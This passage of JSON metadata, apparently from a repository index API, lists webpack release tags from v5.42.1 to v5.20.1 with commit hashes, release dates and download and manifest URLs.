42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webp